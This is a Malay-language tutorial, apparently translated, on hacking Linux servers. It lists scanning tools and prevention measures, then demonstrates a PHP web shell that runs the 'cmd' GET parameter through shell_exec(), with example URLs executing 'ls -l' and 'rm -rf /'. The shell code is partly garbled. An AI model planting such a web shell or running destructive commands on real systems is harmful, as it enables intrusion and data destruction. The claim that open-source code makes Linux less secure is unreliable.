Menggodam OS Linux: Meretas dengan Ubuntu (Perintah Tutorial)

Isi kandungan:

Anonim

Linux adalah sistem operasi pelayan yang paling banyak digunakan, terutamanya untuk pelayan web. Ia adalah sumber terbuka; ini bermaksud sesiapa sahaja boleh mempunyai akses ke kod sumber. Ini menjadikannya kurang selamat dibandingkan dengan sistem operasi lain kerana penyerang dapat mempelajari kod sumber untuk mencari kelemahan . Linux for Hackers adalah mengenai memanfaatkan kelemahan ini untuk mendapatkan akses tanpa izin ke sistem.

Dalam artikel ini, kami akan memperkenalkan kepada anda apa itu Linux, kerentanan keselamatannya, penggodaman dengan Ubuntu dan langkah-langkah pembanding yang dapat anda buat.

Topik yang dibahas dalam tutorial ini

  • Nota Pantas di Linux
  • Alat Penggodaman Linux
  • Cara mencegah peretasan Linux
  • Aktiviti Peretasan: Meretas sistem Linux menggunakan PHP

Nota Pantas di Linux

Linux adalah sistem operasi sumber terbuka . Terdapat banyak pengedaran sistem operasi berasaskan Linux seperti Redhat, Fedora, dan Ubuntu, dan lain-lain. Tidak seperti sistem operasi yang lain, Linux kurang selamat dalam hal keselamatan. Ini kerana kod sumber tersedia secara bebas, jadi mudah untuk mempelajarinya untuk kelemahan dan mengeksploitasinya dibandingkan dengan sistem operasi lain yang bukan sumber terbuka. Linux dapat digunakan sebagai sistem operasi pelayan, desktop, tablet, atau peranti mudah alih.

Program Linux dapat dikendalikan menggunakan GUI atau perintah. Perintah Linux untuk penggodaman Kali Linux lebih berkesan dan efisien berbanding dengan menggunakan GUI. Atas sebab ini, sangat berguna untuk mengetahui arahan asas Linux untuk penggodaman.

Rujuk tutorial ini https://www.guru99.com/unix-linux-tutorial.html mengenai cara memulakan dengan peretasan Kali Linux.

Alat Penggodaman Linux

  • Nessus - alat ini boleh digunakan untuk penggodaman Ubuntu, tetapan konfigurasi imbasan, patch, dan rangkaian dll. Ia boleh didapati di https://www.tenable.com/products/nessus
  • NMap. Alat ini dapat digunakan untuk memantau host yang berjalan di pelayan dan perkhidmatan yang mereka gunakan. Ia juga dapat digunakan untuk mencari port. Ia boleh didapati di https://nmap.org/
  • SARA - SARA adalah singkatan dari Pembantu Penyelidik Juruaudit Keselamatan. Seperti namanya, alat ini dapat digunakan untuk mengaudit jaringan terhadap ancaman seperti SQL Injection, XSS dll. Ia boleh didapati di http://www-arc.com/sara/sara.html

Senarai di atas tidak lengkap; ini memberi anda idea tentang alat yang tersedia untuk sistem Linux hacking dan hacking.

Cara mencegah peretasan Linux

Linux Hacking memanfaatkan kelemahan dalam sistem operasi. Sebuah organisasi boleh menggunakan dasar berikut untuk melindungi dirinya daripada serangan tersebut.

  • Patch management - patch memperbaiki bug yang dimanfaatkan oleh penyerang untuk menjejaskan sistem. Dasar pengurusan tampalan yang baik akan memastikan bahawa anda sentiasa menggunakan tambalan yang relevan ke sistem anda.
  • Konfigurasi OS yang betul - eksploitasi lain memanfaatkan kelemahan dalam konfigurasi pelayan. Nama pengguna dan daemon yang tidak aktif harus dilumpuhkan. Tetapan lalai seperti kata laluan biasa untuk aplikasi, nama pengguna lalai dan beberapa nombor port harus diubah.
  • Sistem Pengesanan Pencerobohan - alat seperti itu dapat digunakan untuk mengesan akses ke sistem yang tidak dibenarkan. Beberapa alat mempunyai kemampuan untuk mengesan dan mencegah serangan tersebut.

Aktiviti Peretasan: Meretas Sistem Linux Ubuntu menggunakan PHP

Dalam senario praktikal ini, kami akan belajar bagaimana menggodam dengan Ubuntu dan kami akan memberi anda maklumat asas mengenai bagaimana anda boleh menggunakan PHP untuk mengorbankan Linux. Kami tidak akan menyasarkan mangsa. Sekiranya anda ingin mencubanya, anda boleh memasang LAMPP pada mesin tempatan anda.

PHP dilengkapi dengan dua fungsi yang dapat digunakan untuk menjalankan perintah peretasan Linux. Ia mempunyai fungsi exec () dan shell_exec (). Fungsi exec () mengembalikan baris terakhir output perintah sementara shell_exec () mengembalikan keseluruhan hasil perintah sebagai rentetan.

Untuk tujuan demonstrasi, anggap pengurus penyerang memuat naik fail berikut di pelayan web.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

DI SINI,

Skrip di atas mendapat arahan dari pemboleh ubah GET bernama cmd. Perintah dilaksanakan menggunakan shell_exec () dan hasilnya dikembalikan dalam penyemak imbas.

Kod di atas boleh dimanfaatkan menggunakan URL berikut

http: //localhost/cp/konsole.php? cmd = ls% 20-l

DI SINI,

  • “… Konsole.php? Cmd = ls% 20-l” memberikan nilai ls -l kepada cmd pemboleh ubah .

Perintah di Ubuntu untuk meretas pelayan akan dilaksanakan sebagai

shell_exec('ls -l') ;

Melaksanakan kod di atas pada pelayan web memberikan hasil yang serupa dengan yang berikut.

Perintah di atas hanya memaparkan fail dalam direktori semasa dan kebenaran

Anggaplah penyerang melepasi arahan berikut

rm -rf /

DI SINI,

  • "Rm" membuang fail
  • "Rf" menjadikan perintah rm dijalankan dalam mod rekursif. Memadamkan semua folder dan fail
  • "/" Memerintahkan perintah untuk mula menghapus fail dari direktori root

URL serangan akan kelihatan seperti ini

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Ringkasan

  • Linux adalah sistem operasi yang popular untuk pelayan, desktop, tablet dan peranti mudah alih.
  • Linux adalah sumber terbuka, dan kod sumber dapat diperoleh oleh siapa saja. Ini memudahkan untuk mengetahui kelemahan. Ia adalah salah satu OS terbaik untuk penggodam.
  • Perintah penggodaman asas dan rangkaian di Ubuntu sangat berharga bagi penggodam Linux.
  • Kerentanan adalah kelemahan yang dapat dimanfaatkan untuk menjejaskan sistem.
  • Keselamatan yang baik dapat membantu melindungi sistem daripada disusupi oleh penyerang.